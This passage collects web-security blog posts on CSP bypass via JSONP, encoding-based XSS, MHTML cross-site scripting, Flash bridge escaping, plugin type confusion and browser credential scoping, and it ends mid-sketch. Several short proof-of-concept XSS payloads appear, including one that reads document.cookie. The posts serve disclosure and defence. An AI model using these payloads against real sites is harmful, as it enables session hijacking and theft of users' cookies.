To understand the problem, it is important to note that in modern times, almost every single domain (be it mozilla.org or microsoft.com) hosts dozens of largely separate web applications consisting of hundreds of unrelated scripts - quite often including normally inactive components used for testing and debugging needs. In this setting, CSP will prevent the attacker from directly injecting his own code on the vulnerable page - but will still allow him to put the targeted web application in a dangerously inconsistent state, simply by loading select existing scripts in the incorrect context or in an unusual sequence. The history of vulnerabilities in non-web software strongly implies that program state corruption flaws will be exploitable more often than we may be inclined to suspect.

If that possibility is unconvincing, consider another risk: the attacker loading a subresource that is not a genuine script, but could be plausibly mistaken for one. Examples of this include a user-supplied text file, an image with a particular plain-text string inside, or even a seemingly benign XHTML document (thanks to E4X). The authors of CSP eventually noticed this unexpected weakness, and decided to plug the hole by requiring a whitelisted Content-Type for any CSP-controlled scripts - but even this approach may be insufficient. That's because of the exceedingly common practice of offering publicly-reachable JSONP interfaces for which the caller has the ability to specify the name of the callback function, e.g.:

GET /store_locator_api.cgi?zip=90210&callback=myResultParser HTTP/1.0
...

HTTP/1.0 200 OK
Content-Type: application/x-javascript
...
myResultParser({ "store_name": "Spacely Space Sprockets",
                 "street": ... });
Having such an API anywhere within a CSP-permitted origin is a sudden risk, and may be trivially leveraged by the attacker to call arbitrary functions in the code (perhaps with attacker-dependent parameters, too). Worse yet, if the callback string is not constrained to alphanumerics – after all, until now, there was no compelling reason to do so – specifying callback=alert(1);// will simply bypass CSP right away.
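
In other words, assuming the vulnerable page whitelists a hypothetical api.example.com that hosts the endpoint shown above, the injected markup needs to be no more complicated than this:

  <script src="https://api.example.com/store_locator_api.cgi?zip=90210&callback=alert(1);//"></script>

The response comes from a whitelisted origin with a script-friendly Content-Type, so the policy is perfectly satisfied - yet the callback prefix executes attacker-chosen code.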

The bottom line is that CSP will require web masters not only to create a sensible policy, but also thoroughly comb every inch of the whitelisted domains for a number of highly counterintuitive but potentially deadly irregularities like this. And that's the tragedy of origin scoping: if people were good at reviewing their sites for subtle issues, we would not be needing XSS defenses to begin with.

April 09, 2011

Using View > Encoding can kill you (in a manner of speaking)

Here's an interesting tidbit: you should never use the View > Encoding menu in any browser unless you fully trust the visited website.

Picking an alternative encoding through that menu overrides the character set not only for the top-level document, but also for all the nested frames - even if they happen to be cross-domain or hidden from view. And that may very well enable the owner of the visited page to carry out an XSS attack against a random third-party application without your knowledge.

Most security researchers associate encoding-related XSS problems with UTF-7, a somewhat preposterous and unnecessary encoding scheme that, by design, allows overlong encoding of 7-bit ASCII values (with disastrous consequences for HTML parsing). Not all browsers support UTF-7, and users are not likely to make that choice in the aforementioned menu. So, we're fine, right?

Well, not exactly. Many other, still popular multi-byte encodings, including Shift JIS or EUC-*, are also fairly problematic: their parsers often suffer from character consumption bugs, and in contrast to UTF-8, relatively little attention has been given to cleaning this up.

For example, with forced Shift JIS, this input is likely to be exploitable:

<img src="http://fuzzybunnies.com/[0xE0]">
  ...this is still a part of the markup...
  " onerror="alert('Hi mom!')" x="
  ...
Simple demo here.

March 12, 2011

Pwn2own considered (somewhat) harmful

I think that hacking challenges and bug bounty programs can be extremely valuable. This is true when they involve transparent, sustained efforts to evaluate the security of a particular platform. For example, I believe that there is a substantial value in Mozilla bug bounties, or in the Chrome reward program. These programs greatly improve the security of the browsers in question, occasionally advance our understanding of web security, and provide tons of statistical data about vendor response processes and attitudes toward security flaws. That last part is arguably the most important metric when dealing with code so complex that for better or worse, it is unlikely to ever be perfectly safe.

I also think that Pwn2own, an annual browser hacking contest run by TippingPoint, does not deliver the same value. The formula of the contest boils down to this: once a year, a single, secretly developed exploit is exchanged for a substantial amount of money. No information about the flaw or its back story is revealed in the process, and given that this trade is negligible in comparison to the annual volume of browser vulnerabilities, there is absolutely no intrinsic value in observing it.

That, alone, is not a compelling criticism; at best, it's a reason not to watch. But then, there are some negative consequences, too: it is in the interest of the conference and contest organizers, and the participating researchers, to get publicity for their findings - and journalists, who do not necessarily have a holistic view of the day-to-day browser security research, embrace such high-profile developments with disproportionate enthusiasm. The resulting ecstatic press coverage ultimately undermines any attempt to have a meaningful and reasonable discussion about the state of browser security.

Take this quote, which likely will be repeated in every Safari-related story for the next twelve months:

"A team was able to exploit Safari to exploit a MacBook Air in five seconds. Yes, five seconds - less time than it takes most people just to type 'Safari got hacked in less than five seconds'."

That's remarkable, but also completely wrong. It takes days or weeks to find and exploit a vulnerability, and Pwn2own is no exception: the actual exploits are prepared months or weeks in advance, and simply executed on the day the contest takes place. I do not think there is a single person in the information security industry who would say that the discovery of a normal browser vulnerability is a notable event: several hundred such flaws are discovered and resolved every year in every browser, as evidenced by release notes maintained by the vendors with varying degrees of accuracy. Neither the fact that somebody discovered a vulnerability before Pwn2own, nor that this person needed five seconds to execute that pre-made code, is a useful measure of anything.

Similarly, the survival of Firefox and Chrome intuitively makes me happy, because I know that these browsers give a lot of thought to security - but I do not think that Pwn2own is a meaningful testament to this. Perhaps these two vendors merely patched up the vulnerability somebody wanted to use, and there was not enough time to find a new one. Or perhaps nobody attending the event (which brings together only a tiny fraction of the infosec community) had the expertise and the inclination to target this particular browser.

Yes, there are vendors who lag behind the rest when it comes to vulnerability response and proactive security work; and there are some hard problems we still have to solve to make the web a safer environment. But the headlines inspired by Pwn2own (and probably encouraged by the organizers) are very unfair, and unnecessarily alienate the parties who should be paying attention to their security posture. Investigating real data, and asking some hard-hitting questions, can make more of a difference... and if done right, it can be more fun.

March 11, 2011

A note on an MHTML vulnerability

There is an ongoing discussion about a recently disclosed, public vulnerability in Microsoft Internet Explorer, and its significance to web application developers. Several of my colleagues investigated this problem in the past few weeks, and so, I wanted to share our findings.

As some of you may be aware, Microsoft Internet Explorer supports MHTML, a simple container format that uses MIME encapsulation (nominally multipart/related) to combine several documents into a single file. Each container may consist of a number of possibly base64-encoded documents, with their content type determined solely by the inline MIME data.

Perhaps by virtue of not having cross-browser support, the MHTML format is not commonly used on the web - but it is employed by Internet Explorer itself to save downloaded pages to disk; and embraced by some third-party applications to deliver HTML-based documentation and help files.

To facilitate access to MHTML containers, the browser also supports a special mhtml: URL scheme, followed by a fully-qualified URL from which the document is to be retrieved; a "!" delimiter; and the name of the target resource inside the container. Unfortunately, when MHTML containers are accessed over protocols that provide other, normally authoritative means for specifying document type (e.g. Content-Type in HTTP traffic), this protocol-level information is ignored, and a very lax MIME envelope parser is invoked on the retrieved document, instead. The behavior of this parser is not documented, but it appears that in many cases, adequately sanitized user input appearing on HTML pages, in JSON responses, CSV exports, image metadata, and so forth, is sufficient to trick it into treating the underlying document as valid MHTML. All that is needed to keep this parser happy is the ability to place several alphanumeric and punctuation characters on the target page, in several separate lines.

The payload inside such an unintentionally served "MHTML container" is able to execute JavaScript, and has same-origin DOM access to the originating domain; with some minimal effort, it is also able to access to domain-specific cookies. Therefore, this behavior essentially represents a universal cross-site scripting flaw that affects a significant proportion of all sensitive web applications on the Internet.
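
The overall shape of the attack, heavily simplified and with made-up names (the real envelope requirements are laxer than shown here): the attacker frames a victim URL through the mhtml: scheme, and relies on benign-looking text previously planted on that page to double as the MIME envelope:

  <!-- On the attacker's page: -->
  <iframe src="mhtml:http://victim.example/comments?id=123!part1"></iframe>

  <!-- Sanitized-looking text the attacker managed to place on the victim
       page, spread over several lines, which the lax parser accepts as
       an MHTML body; the base64 blob decodes to a script tag: -->
  Content-Type: multipart/related; boundary="_sep_"

  --_sep_
  Content-Location: part1
  Content-Type: text/html
  Content-Transfer-Encoding: base64

  PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==
  --_sep_--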

Based on this 2007 advisory, it appears that a variant of this issue first appeared in 2004, and has been independently re-discovered several times in that timeframe. In 2006, the vendor reportedly acknowledged the behavior as "by design"; but in 2007, partial mitigations against the attack were rolled out as a part of MS07-034 (CVE-2007-2225). Unfortunately, these mitigations did not extend to a slightly modified attack published in the January 2011 post to the full-disclosure@ mailing list.

It appears that the affected sites generally have very little recourse to stop the attack: it is very difficult to block the offending input patterns perfectly, and there may be no reliable way to distinguish between MHTML-related requests and certain other types of navigation (e.g., <embed> loads). A highly experimental server-side workaround devised by Robert Swiecki may involve returning HTTP code 201 Created rather than 200 OK when encountering vulnerable User-Agent strings - as these codes are recognized by most browsers, but seem to confuse the MHTML fetcher itself.

Until the problem is addressed by the vendor through Windows Update, I would urge users to consider installing a FixIt tool released by Microsoft as an interim workaround.

Update: see this announcement for more.

March 06, 2011

The other reason to beware ExternalInterface.call()

Adobe Flash has a function called ExternalInterface.call(...), which implements a JavaScript bridge to the hosting page. It takes two parameters: the first one is the name of the JavaScript function to call. The second one is a string to pass to this function.

It is understood that the first parameter should not be attacker-controlled (of course, mistakes happen :-). It is also understood that there is no inherent harm in putting user input in the second parameter, if the callback function itself is not behaving stupidly; in fact, Adobe documentation gives an example that follows this very pattern:

  ...
  ExternalInterface.call("sendToJavaScript", input.text);
  ...

Such a call would be translated to an eval(...) statement injected on the embedding page. This statement looks roughly the following way:

  try {
    __flash__toXML(sendToJavaScript("value of input.text")) ;
  } catch (e) {
    "<undefined/>";
  }

When writing the supporting code behind this call, the authors remembered to use backslash escaping when outputting the second parameter: hello"world becomes hello\"world. Unfortunately, they overlooked the need to escape any stray backslash characters, too.

So, try to figure out what happens if the value of input.text is set to the following string:

  Hello world!\"+alert(1))); } catch(e) {} //

I reported this problem to Adobe in March 2010. In March 2011, after following up, I received the following response:

"We have not made any change to this behavior for backwards compatibility reasons."

Caveat emptor :-)

Warning: OBJECT and EMBED are inherently unsafe

Let's say that you maintain an online discussion forum. Assuming that you explicitly specify the type= parameter in your <object> or <embed> markup, what are the security consequences of allowing users to embed third-party Flash movies in their posts when you enforce the appropriate security restrictions on your end (allowScriptAccess, allowNetworking, allowFullScreen all set to none)? Or, to make things simpler, how about permitting a straightforward video file, with type=video/x-ms-wmv?

If you think this is safe, you may want to know that the HTML5 spec has a different view. The specification effectively takes away the ability for any single party to decide how a particular plugin document should be handled by the browser. Under the new algorithm, instead of your funny cat video, you may accidentally end up embedding Java, which has unconditional access to the DOM of the embedding page through DOMService. Whoops, looks like you are owned now.

According to the spec, if your visitor's browser has, say, a Windows Media Player plugin that recognizes the type=video/x-ms-wmv value on your webpage, that plugin will be used regardless of Content-Type. This part is intuitive. Alas, if the plugin is not found, the specification compels the software to look at Content-Type next, giving the hosting party an opportunity to override the intent specified on your end.
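
To restate the forum scenario in markup (everything below is hypothetical): the post author believes they are embedding a locked-down Flash movie, but the type= attribute only wins if a matching plugin is actually installed:

  <object type="application/x-shockwave-flash"
          data="https://uploads.example.com/user-files/funny_cat_movie"
          width="480" height="360">
    <param name="allowScriptAccess" value="never">
    <param name="allowNetworking" value="none">
    <param name="allowFullScreen" value="false">
  </object>

On a machine without that plugin, the specification tells the browser to consult the server's Content-Type instead - so whoever controls the response headers for that upload gets to pick the plugin, restrictions notwithstanding, Java included.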

To further complicate the picture, in some circumstances, browsers may also ignore both type= and Content-Type values: for example, Internet Explorer and WebKit browsers will play Flash videos served with Content-Type: pants/whatever and loaded with type=certainly/not-flash just because a stray .swf file extension is spotted somewhere in the URL. The file name signal is problematic, as it can usually be tampered with by whoever provides the URL. This strategy brings yet another player into the picture, and each party can sabotage the security assurances sought by the rest.

It would be more reasonable to keep the behavior of <object> and <embed> consistent with that of other type-specific subresource tags (e.g., <applet>, <img>, or <script>), and give control over how the document is rendered to whoever authored the markup. This approach is still not without peril, because it makes it impossible for some sites to indicate that a particular text/plain or image/jpeg response is not meant to be interpreted as a malicious applet. But that last problem can be fixed by requiring Content-Type and type= to match, perhaps through an opt-in mechanism controlled with a new HTTP header. And in any case, the proposed logic does not help.

In the end, the currently specified behavior seems highly counterintuitive, and undoes all the work that plugin vendors such as Adobe or Microsoft put into adding security controls to ensure that their plugin content is reasonably safe to embed across domains that do not fully trust each other.

Test cases here. Joshua Stein also reports that they confuse Flash-blocking tools.

February 21, 2011

Give me A, give me P, give me T

Following my earlier entry about HBGary, several people asked if I did not believe in the fashionable concept of Advanced Persistent Threats.

My view is a bit different. Any organization that focuses solely on the prevention of non-targeted attacks is making a grave mistake. This hasn't changed at all in the past two decades: attackers interested in a particular target, and willing to spend several weeks on such a pursuit, have always been a huge problem. In the vast majority of documented cases, they did not need to be unusually sophisticated to succeed, either - and in proportion to the size of the online economy, I don't think they are any more numerous than, say, ten years ago.

Fending off these attackers in large and complex environments is very difficult, and requires in-depth in-house expertise, lots of ingenuity - and even then, it may occasionally fail. Alas, at the behest of vendors and infosec pundits, many organizations made exactly the wrong choice, and spent the bulk of their efforts on ISO 27002, PCI, SOX, and off-the-shelf AV and IDS tools - building a more measurable and familiar, but ultimately vulnerable, world.

It is increasingly evident that the value of these solutions in containing determined attackers is fairly small. The parties involved would rather say that they had done the right thing all along, and that the threat landscape simply changed in the meantime. But the claim that they are facing a brand new, incredibly sophisticated adversary is a very self-serving one.

So, I am simply saddened by the emphasis on the "advanced" part of the term, and the Cold War rhetoric employed to push even more expensive and ultimately meaningless products and approaches. Whether you are a government agency or a Fortune 500 corporation, chances are, buying services such as 0-day vulnerability notifications or botnet monitoring is not an efficient use of your money.

February 18, 2011

Possibly the most fascinating HTML parser behavior ever

I learned about this tidbit from sirdarckcat. It is in no way new, but the trick is so cute that I just could not resist sharing.

When parsing HTML documents, browsers recognize two methods of specifying tag parameter values: a "bare" form (such as <img src=image.jpg>), which is terminated by angle brackets, whitespaces, and so on; and a quoted form (<img src="image.jpg">) which is terminated only by a matching quote.

Every browser makes the decision by looking at the first non-whitespace character after the name=value separator. If this happens to be a single or a double quotation mark, the second parsing strategy is used; otherwise, the first method is a go. Internet Explorer also recognizes backticks (`) as a faux quote, leading to security flaws in a fair number of HTML filters - but even with this quirk, the behavior is still pretty straightforward. In particular, in the following example, stray quotes will not have any effect on how the tag is interpreted:

<a href=http://www.example.com/?">This text is not a tag parameter anymore.">Click me</a>

But here's the thing: Internet Explorer seems to be doing a substring search for an equals sign followed by a quote anywhere in the parameter name=value pair. Therefore, the following syntax will be parsed in a very different way:

<a href=http://www.example.com/?=">This is still a part of markup indeed!">Click me</a>

It's one of the strangest, most surreal HTML parser quirks I am aware of (and it survives to this day in Internet Explorer 9). In principle, it allows any server-side HTML filter to get out of sync with the browser, leading to parameter splitting and tag consumption. In reality, it has limited practical significance: if your HTML filter is relaxed enough to allow this syntax to go through, it is probably already vulnerable to the abuse of other syntax tricks.

February 16, 2011

The world of HBGary

I am truly frightened by the emerging picture of the compromise of HBGary Federal. And it is not because of the alleged, disturbing business proposal to, among other things, intimidate a well-known journalist and indiscriminately distribute malware.

It is also not because of the likelihood that a similarly opportunistic and amoral corporate culture is endemic to the entire sector - a suspicion made more credible after noticing that the leaked proposal uses the letterhead of another government-friendly company, Palantir, and generously credits a third one: Berico.

No, that's not it. The reason why I am frightened is the emergence of a new class of government contractors - a class that depends on the perpetuation of an alluring, yet completely irrelevant belief: that an incredibly sophisticated and determined adversary is constantly scheming to wage a devastating cyber-war against everything we hold dear.

It is an ugly truth: for the past 10 or 15 years, the security industry has made virtually no progress in helping large organizations deal not with Bond-esque villains, but with the simple threat of bored kids and geeks with an agenda - their most significant, and most unpredictable, foe. It is tempting to frame the constant stream of high-profile failures as proof of the evolution of your adversary. But when you realize that almost every single large institution can probably be compromised by a moderately skilled attacker, this explanation just does not ring true.

The inability to solve this increasingly pressing problem is no reason to celebrate - and even less of a reason to push for preposterous, unnecessary spending on silly intelligence services, or to promote overreaching and ill-defined regulation. If anything, it is a reason to reflect on our mistakes and perhaps go back to the drawing board. But between all the talk of cyber-jihad and APT, this unpleasant message is easy to overlook.

...

On the flip side, the difficulty of securing a complex enterprise hardly applies to specialized, well-funded security outlets: that one problem is easy to fix. These companies should have an abundance of expertise and resources to tightly manage and monitor their relatively small and self-contained networks. Similarly, their employees can be reasonably expected to exercise above-average restraint and a good dose of common sense. It is an uncomplicated matter of living up to your own bold claims.

From this perspective, the purported details of the attack on HBGary - a horribly vulnerable, obscure CMS; unpatched internal systems; careless password reuse across corporate systems and Twitter or LinkedIn; and trivial susceptibility to e-mail phishing - are truly fascinating. These tidbits seem to imply either extreme cynicism on the part of their staff... or an unbelievable level of cluelessness. And from a broader perspective, both of these options are pretty scary.

Oh, the ironic part? Despite all the lofty rhetoric, it looks like, in the end, they were undone by just a bunch of bored kids.

February 04, 2011

So you think *your* capability model is bad?

In his recent post, Brad Spengler mocked the Linux capability system - a somewhat ill-conceived effort to add modern access controls on top of the traditional Unix permission model. Brad noted that most of the CAP_* boundaries are not particularly well aligned with the underlying OS, and not internally consistent - and therefore, much of the resulting granularity is almost completely meaningless: for example, there is no substantial benefit in giving an application just CAP_SYS_MODULE, CAP_MKNOD, CAP_SYS_PTRACE, or CAP_SYS_TTY_CONFIG privileges, as all of these are essentially equivalent to giving root access to the ACLed program.

I thought it would be interesting to engage in a similar thought experiment for the browser environment - after all, it is quickly becoming the equivalent of a complex and powerful operating system for modern web applications.

As far as normal web applications are concerned, there is no concept of a globally privileged access level; instead, permissions to access content on the client and server side are controlled by four separate, implicit authentication schemes:

  • HTTP cookies (reference):

    • Visibility: explicitly visible to client and server code.

    • Scoping: scoped to the originating functional domain (or a subdomain thereof). Can be additionally scoped to a specific document path; this is meaningless as a security boundary (see the sketch after this list).

    • Notes: a kludge to allow scoping to HTTPS only is present - the secure flag; this mechanism offers far less benefit than it could, because HTTP and HTTPS cookie jars are not isolated otherwise.

  • Legacy HTTP authentication (reference):

    • Visibility: explicitly visible to server code; sometimes exposed to client code.

    • Scoping: scoped to a protocol-host name-port tuple. In some but not all browsers, additionally scoped to a specific request path; or to a server-declared "realm" string.

  • Client SSL certificates:

    • Visibility: visible to server code only.

    • Scoping: scoped globally in the browser.

    • Notes: in most but not all browsers, the user must confirm sending a certificate to a particular destination host name once within a browsing session.

  • Script origin:

    • Visibility: principally visible to client code only; unreliably disclosed to server on some requests.

    • Scoping: origin is defined by a protocol-host tuple; port number is also included in most, but not all, browsers.

  • Notably absent: network context. The information about the circumstances in which a particular credential is established is not analyzed or preserved. Because of the persistence of web content, this poses a significant problem with public wireless networks.
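
As hinted at in the cookie entry above, here is a minimal sketch of why path-based cookie scoping offers no real protection; the host name, paths, and cookie contents are made up. Any same-origin document can simply frame the "protected" path and read its cookies through the DOM:

  <!-- Served from http://example.com/forum/post.html: -->
  <iframe src="/banking/" name="victim"></iframe>
  <script>
    window.onload = function() {
      // Same origin, so a cookie restricted to path=/banking/ is still
      // visible to this page via the framed document:
      alert(frames["victim"].document.cookie);
    };
  </script>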

The above set of overlapping credential schemes is then used to build a number of client-side mechanisms with a range of conflicting security boundaries:

  • Subresource loads (reference):

    • Relevant to: the ability to load images, scripts, plugins, frames, and other types of embedded content; and to navigate the top-level window.

    • Security boundaries: this capability is not generally restricted in modern browsers. Certain response types can be read directly across websites; others can be requested, and then examined only indirectly.

    • Interactions: server response can and often will be tied to server-recognized credentials, including cookies, SSL certificates, or client-supplied origin (non-universal Origin or unsafe Referer header).

  • DOM access (reference):

    • Relevant to: the ability to directly access loaded documents through the JavaScript Document Object Model - a method considerably more versatile than the previous scenario.

    • Security boundaries: privilege scoped to origin; when origin is not fully qualified, behavior is undefined. Scope can be expanded to the functional domain via document.domain; this has unintended consequences and is usually unsafe (see the sketch after this list).

    • Interactions: access is not tied to any other credentials; for example, replacing or removing cookies does not revoke access from old documents to the new ones, and vice versa.

  • Most types of browser API access:

    • Relevant to: access to browser-managed interfaces such as postMessage(), localStorage, geolocation information, pop-up privileges, and so forth.

    • Security boundaries: permissions theoretically scoped to origin, but Firefox and MSIE currently violate this rule for localStorage and sessionStorage, and scope to host; when origin is not fully qualified, behavior is undefined. Additional top-level window scoping is introduced for sessionStorage. Unlike with DOM access, these permissions are not affected by document.domain.

    • Interactions: access is not tied to any other credentials.

  • XMLHttpRequest API (reference):

    • Relevant to: the ability to make almost arbitrary, credential-bearing HTTP requests, and read back raw responses, from within JavaScript code.

    • Security boundaries: permission scoped to origin; when origin is not fully qualified, behavior is undefined. Port number is always compared, even in browsers that do not include it in other origin checks. Scope not affected by document.domain.

    • Notes: access to another origin is possible after a simple HTTP handshake in modern browsers.

    • Interactions: server response can and often will be tied to server-recognized credentials.

  • Web sockets API (reference):

    • Relevant to: a new HTML5 feature in WebKit browsers, allowing scripts to establish long-lived stream connections to arbitrary servers.

    • Security boundaries: scripts can access any server and port after a successful completion of a challenge-response handshake.

    • Interactions: server is provided with requestor's origin information and cookies to authenticate the request.

  • Cookie access (reference):

    • Relevant to: the ability to read or write the document.cookie property.

    • Security boundary: content is scoped to a particular domain, path, and secure flag level, as governed by cookie scoping rules. Cookies may also be tagged as httponly, preventing reads (but not writes) from within JavaScript.

    • Notes: document.cookie has highly asymmetrical write and read behavior; it is possible to overwrite cookies for subdomains, paths, or secure / httponly settings well outside the setter's nominal visibility.

    • Interactions: not tied to any other credentials or network context. Substantially incompatible with DOM access boundaries, affecting both schemes: DOM rules make cookie path scoping useless, while lax cookie scoping often undermines DOM origin-based isolation in cookie-authenticated web applications.

  • Password managers:

    • Relevant to: password auto-completion capabilities integrated with most browsers.

    • Security boundaries: stored credentials are scoped to origin, path, and form layout; only the first part constitutes a meaningful security boundary.

    • Notes: in some but not all browsers, an explicit user action is needed to expose credentials to the origin.

    • Interactions: incompatibility with DOM access rules makes path and form scoping useless from security perspective. Existing credentials are not taken into account when completing form data. Saved passwords are generally converted to cookie-based credentials by the server using an application-specific mapping.

  • Cache control:

    • Relevant to: implicit and explicit retrieval of previously cached documents when requested by the client-side code.

    • Security boundaries: cached content is scoped to original request URL and POST payload; once retrieved from the cache, it follows the same rules as any fresh response would.

    • Interactions: caches may be shared by multiple users. Cached content is not explicitly tied to any credentials - logging out does not invalidate cached documents, and does not prevent same-origin access later on. If shared proxies are accidentally permitted to cache the response, it may be returned to other users, even though their requests do not bear relevant cookies.

  • Internet Explorer zone model:

    • Relevant to: a proprietary mechanism that allows elevated privileges to be granted to certain content, and prevents navigation between certain groups of websites.

    • Security boundaries: a mix of origin scoping for explicitly defined URLs; protocol-level scoping for file:// content; and IP, host name, and proxy configuration heuristics for Intranet resources.

    • Notes: local network heuristics can fail spectacularly in certain settings. Zone settings are fairly cryptic and difficult to understand. Users frequently add not-particularly-trustworthy websites to more privileged zones to work around usability problems.

    • Interactions: not consistently synchronized with any other security boundaries. Largely neglects to consider the impact of cross-site scripting flaws.

  • Plugin access:

    • Relevant to: various activities of plugin-delivered active content, which generally shares the HTTP stack, cookie jar, and document cache with the browser; and has DOM access to the embedding page.

    • Security boundaries: a variety of custom, inconsistent models: for example, Java considers all content originating from the same IP as same-origin; Flash glosses over redirects and considers their result same-origin with the initial URL. Most plugins also offer multiple ways to negotiate cross-domain access.

    • Notes: plugin origin is derived from the URL from which the code is retrieved; Content-Type and Content-Disposition are usually ignored during this operation.

    • Interactions: largely inconsistent with all other browser security mechanisms.
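
To illustrate the document.domain hazard flagged in the DOM access entry above, consider this minimal sketch (host names made up). Once two subdomains opt in, every other subdomain of the same functional domain can make the same call - including any that happen to host user-supplied content:

  // Executed on http://www.example.com/ and http://users.example.com/ alike:
  document.domain = "example.com";
  // From this point on, documents from the two hosts can reach into each
  // other's DOM - and so can any other example.com subdomain that opts in.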

Operating systems are more complex and more diverse than browsers; but I dare you to come up with an example of a design nearly as messy and dangerous as this. It is not just that the set of capabilities is odd, spurious, and sometimes redundant; it is that each and every one of them has a slightly different understanding of who you are, and what permissions you need to be given.

February 01, 2011

The dreaded curse of openness

Several weeks ago, the chairman of Trend Micro had this to say:

"Android is open-source, which means the hacker can also understand the underlying architecture and source code. We have to give credit to Apple, because they are very careful about it. It's impossible for certain types of viruses to operate on the iPhone."

Now that Kaspersky has, ahem, joined the open source crowd - I worry that hackers may soon be able to understand the operation of anti-virus software as well. And beyond that unthinkable point, only darkness looms.

January 01, 2011

Announcing cross_fuzz, a potential 0-day in circulation, and more

I am happy to announce the availability of cross_fuzz - a surprisingly effective but notoriously annoying cross-document DOM binding fuzzer that helped identify about one hundred bugs in all browsers on the market - many of said bugs exploitable - and is still finding more.

The fuzzer owes much of its efficiency to dynamically generating extremely long-winding sequences of DOM operations across multiple documents, inspecting returned objects, recursing into them, and creating circular node references that stress-test garbage collection mechanisms.
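
This is not the actual fuzzer - just a minimal sketch of the flavor of operations it chains together, with docA and docB standing in for two of the documents it juggles:

  // A rough illustration only; the real tool randomizes and recurses far deeper.
  var node = docA.createElement("div");
  docB.body.appendChild(docB.adoptNode(node));   // shuttle nodes between documents
  node.circular = docA.documentElement;          // set up circular references
  for (var prop in node) {                       // crawl whatever the bindings return
    try { void node[prop]; } catch (e) { /* keep going */ }
  }
  node = null;                                   // ...and leave the rest to the garbage collector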

This design can make it unexpectedly difficult to get clean, deterministic repros; as a result, in the current versions of all the affected browsers, we are still seeing a collection of elusive problems when running the tool - and some not-so-elusive ones. I believe that at this point, broader community involvement may be instrumental in tracking down and resolving these bugs.

I also believe that at least one of the vulnerabilities discovered by cross_fuzz may be known to third parties - which makes getting this tool out a priority.

The following summarizes notification and patch status for all the affected vendors:

  • Internet Explorer: MSRC notified in July 2010. Fuzzer known to trigger several clearly exploitable crashes (example stack trace for CVE-2011-0346) and security-relevant GUI corruption issues (XP-only, example, CVE-2011-0347). Reproducible, exploitable faults still present in current versions of the browser. I have reasons to believe that one of these vulnerabilities is known to third parties.

    Comment: The vendor acknowledged receiving the report in July (case 10205jr), but did not contact me again until my final ping in December. Following that contact attempt, they were able to quickly reproduce multiple exploitable crashes, and asked for the release of this tool to be postponed indefinitely. Since they have not provided a compelling explanation as to why these issues could not have been investigated earlier, I refused; see this timeline for more.

  • All WebKit browsers: WebKit project notified in July 2010. About two dozen crashes identified and addressed in bug 42959 and related efforts by several volunteers. Relevant patches generally released with attribution in security bulletins. Some extremely hard-to-debug memory corruption problems still occurring on trunk.

  • Firefox: Mozilla notified in July 2010. Around 10 crashes addressed in bug 581539, with attribution in security bulletins where appropriate. Fuzzing approach subsequently rolled into Jesse Ruderman's fuzzing infrastructure under bug 594645 in September; from that point on, 50 additional bugs identified (generally with no specific attribution at patch time). Several elusive crashes still occurring on trunk. Bad read / write offset crashes in npswf32.dll can also be observed if the plugin is installed.

  • Opera: vendor notified in July 2010. Update provided in December states that Opera 11 fixed all the frequent crashes, and that a proper security advisory will be released at a later date (release notes list a placeholder statement: "fixed a high severity issue"). Several tricky crashes reportedly still waiting to be resolved.

    Note that with Opera, the fuzzer needs to be restarted frequently.

Well, that's it. To download the tool or see it in action, you can follow this link. The fuzzer may be trivially extended to work with any other DOM-compliant documents, plugin bindings, and so forth.

December 20, 2010

Carrot, stick, research, disclosure

Several days ago, Marcia Hoffman of the Electronic Frontier Foundation praised Facebook's policy on vulnerability reports - and went as far as calling it "exceptional":

"If you share details of a security issue with us and give us a reasonable period of time to respond to it before making it public, and in the course of that research made a good faith effort to avoid privacy violations, destruction of data, or interruption or degradation of our service, we will not bring any lawsuit against you or ask law enforcement to investigate you for that research."

I respect my colleagues at Facebook - but I do not think this policy deserves such praise.

The problem is that with extremely rare exceptions, software vendors do not object to being given reasonable notice about a vulnerability - but one of the most significant points of contention between them and the research community is the meaning of that single, special word: "reasonable".

Because of different incentives, businesses have a history of allowing privately reported vulnerabilities to go unresolved for a year or more; and many of the best-known names in the industry have attempted to suppress good-faith attempts to alert the public to their apparent non-responsiveness.

I suspect that Facebook is capable and willing to respond to vulnerability reports promptly, and will not resort to such tricks - but that does not make the policy sound any better. The promise not to sue people who satisfy an unspecified but vendor-defined expectation of "reasonable time" implicitly creates a threat of prosecution in non-compliant cases, and equates them with the other, clearly malicious practices listed in the aforementioned paragraph.

There are interesting examples of exceptional, researcher-friendly policies out there; this one doesn't belong, yet.

December 13, 2010

Unencrypted public wifi should die

Unencrypted public access wireless networks are an unbelievably harmful technology devised with no regard for the operation of the modern web - and they introduce far more problems than is immediately apparent. The continued use of unencrypted wifi at the municipal level and in consumer-oriented settings is simply inexcusable, even if all the major websites on the Internet can be pressured into employing HTTPS-only access and Strict Transport Security by default.

Straightforward snooping and cute tricks such as sslstrip aside - all of them still deadly effective, by the way - there are many less obvious problems we simply can't solve any time soon:

  • Cookie poisoning: the JavaScript same-origin policy draws a clear boundary between encrypted and non-encrypted content - but HTTP cookies are critically broken in this regard. It is possible to selectively overwrite secure cookies with malicious values over HTTP - with disastrous consequences for most contemporary web apps (see the sketch after this list).

  • Plugin SOP problems: similarly to cookies, the variants of same-origin access rules implemented by plugins such as Java, Flash, or Silverlight are often peculiar - and do not necessarily respect the isolation between encrypted and non-encrypted content (but do share the cookie jar and document cache with the rest of the browser).

  • Cache poisoning: the browser cache persists across network visits. On insecure wireless networks, malicious active content can be persistently cached in any non-encrypted origin - even if that origin is not intentionally visited - and will be carried onto trusted networks accessed later on (e.g., home or corporate environments); in other words, your browser may be essentially permanently backdoored after a single visit to a public hotspot. Curiously, there has been some renewed interest in this area as of late. HTML5 features such as cache manifests and local storage promise to make the problem even more pronounced.

  • Cache retrieval: for the same reason, content injected over insecure wireless networks can comprehensively enumerate and read back all previously stored objects in browser cache, in arbitrarily selected non-encrypted origins - a huge privacy problem for as long as any remotely sensitive data is still exchanged over HTTP - even when this exchange itself happens only over private, secure networks.

  • Address bar autocompletion poisoning: even with mechanisms such as Strict Transport Security in place, content injected over insecure networks may attempt to silently poison address bar autocompletion mechanisms - ensuring that future attempts to navigate to a particular website will be completed in a subtly incorrect way, and will take the victim to a malicious domain name instead.
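
To make the first of these points more concrete, here is a minimal sketch of cookie poisoning on an open network; the host and cookie names are made up. The attacker only needs to tamper with any plaintext HTTP response the victim's browser happens to load:

  <!-- Returned by the attacker for any plaintext http://www.example.com/
       request observed on the hotspot (or for a request the attacker
       forces the browser to make in the background): -->
  <script>
    // No "secure" flag is needed to plant this cookie - yet the poisoned
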